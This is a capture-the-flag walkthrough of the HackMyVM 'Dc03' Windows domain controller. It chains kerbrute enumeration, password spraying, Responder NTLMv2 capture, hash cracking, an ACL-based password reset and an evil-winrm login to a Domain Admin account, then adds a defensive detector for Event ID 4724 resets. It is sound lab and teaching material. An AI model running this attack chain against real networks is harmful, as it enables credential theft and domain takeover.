Dc03
Date: November 23, 2024
Created by: josemlwdf
Page: HackMyVm
Difficulty: Medium
OS: Windows

I start with a scan of the open ports.

nmap -p- --open --min-rate 5000 -sS -Pn 10.0.2.7 -oG scan

I continue with a scan of the versions and technologies running on the open ports that we have found.

nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49680,49722 -sCV -Pn 10.0.2.7 -oN ports

Using kerbrute I search for valid users in the system.

/opt/kerbrute_linux_386 userenum --dc 10.0.2.7 -d SOUPEDECODE.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

I check whether any of the found users uses their username as their password, but I don't get anything.

netexec smb -u users_kerbrute -p users_kerbrute --continue-on-success 10.0.2.7
netexec smb -u users_kerbrute -p users_kerbrute --continue-on-success --no-brute 10.0.2.7
netexec winrm -u users_kerbrute -p users_kerbrute --continue-on-success 10.0.2.7
netexec winrm -u users_kerbrute -p users_kerbrute --continue-on-success --no-brute 10.0.2.7

After trying different things I listen with Responder to sniff the traffic.

responder -I eth0 -w -d

I capture an NTLMv2 hash; when I crack it with john I get the password of the user xkate578 in clear text.

john --wordlist=/usr/share/wordlists/rockyou.txt hashNTLMv2

With these credentials I check which SMB shares I have access to; IPC$ and share are the most important ones. Thanks to having read permissions on IPC$ I am able to enumerate the domain. From the information obtained, my user and the user fbeth103 stand out because of the groups they belong to.

ldapdomaindump -u 'SOUPEDECODE.LOCAL\xkate578' -p jesuschrist 10.0.2.7

Moving on now to the share folder, I list its contents and manage to read the first flag.

smbclient -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" //10.0.2.7/share

I collect information with bloodhound-python to get another view of how the domain is set up. At first it fails with a time (clock skew) error, and then with another error about the DNS server. To fix the second one I spoof the DNS server on my machine with dnschef.

dnschef --fakeip 10.0.2.7
ntpdate -u 10.0.2.7 ; bloodhound-python -u 'xkate578' -p 'jesuschrist' -ns 127.0.0.1 -d soupedecode.local -dc dc01.soupedecode.local --zip

In this way I am able to extract the information, and by deploying neo4j and BloodHound I can see graphically the relationships between users and groups. It does not suggest any way to move laterally or escalate privileges.

I look for information about the group that xkate578 belongs to (the user whose credentials I have), and I see that it can change the passwords of other users. I try it on the user fbeth103.

impacket-changepasswd SOUPEDECODE.LOCAL/fbeth103@10.0.2.8 -altuser xkate578 -altpass jesuschrist -newpass Pepe123. -reset #It can also be done with rpcclient

After changing the user's password and verifying that the new credentials are correct, I notice that this user is a member of "Operators" and a member of "Domain Admins". Thanks to this I can connect to the system and read the second flag.

evil-winrm -i 10.0.2.8 -u fbeth103 -p Pepe123.
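From a defender's side, the password reset above leaves a Windows Security Event ID 4724 ("An attempt was made to reset an account's password") on the domain controller, where the subject is xkate578 and the target is fbeth103. The following is an added example (not from the writeup or the machine author) that flags such resets when the subject is not an expected helpdesk account and the target is privileged; the event lines, the allow-list, the privileged-account list and the account jdoe101 are all constructed for the demonstration.

```python
"""Flag suspicious password resets (Windows Security Event ID 4724) where a
non-helpdesk account resets the password of a privileged account, as
xkate578 did to fbeth103 in this writeup.  All sample data is constructed."""
import re
from typing import Dict, List, Tuple

# Constructed sample events as key=value pairs, mirroring the 4724 fields that
# matter: who performed the reset (Subject) and whose password it was (Target).
SAMPLE_EVENTS = [
    "EventID=4724 SubjectUserName=Administrator TargetUserName=jdoe101",
    "EventID=4724 SubjectUserName=xkate578 TargetUserName=fbeth103",
    "EventID=4723 SubjectUserName=xkate578 TargetUserName=xkate578",
    "EventID=4724 SubjectUserName=xkate578 TargetUserName=jdoe101",
]

# Constructed allow-list of accounts expected to reset other users' passwords.
RESET_ALLOWED = {"administrator"}
# Constructed list of Domain Admins / Operators members (fbeth103 per the writeup).
PRIVILEGED = {"administrator", "fbeth103"}

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value event line into a dict of its fields."""
    return dict(FIELD_RE.findall(line))


def classify_reset(event: Dict[str, str]) -> str:
    """Return a severity for a 4724 event, or "" if it needs no attention.
    4723 (a user changing their own password) is ignored on purpose: only a
    reset performed by a third party is relevant here."""
    if event.get("EventID") != "4724":
        return ""
    subject = event.get("SubjectUserName", "").lower()
    target = event.get("TargetUserName", "").lower()
    if subject in RESET_ALLOWED:
        return ""
    # An unexpected account resetting a privileged user is the ACL-abuse
    # path from the writeup; any other unexpected reset is still worth a look.
    return "HIGH" if target in PRIVILEGED else "MEDIUM"


def find_suspicious_resets(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (severity, subject, target) for each reset to investigate."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        sev = classify_reset(ev)
        if sev:
            findings.append((sev, ev["SubjectUserName"], ev["TargetUserName"]))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_resets(SAMPLE_EVENTS):
        print(*finding)
```

In a real environment the two sets would be fed from group membership (for example the ldapdomaindump output above) rather than hard-coded.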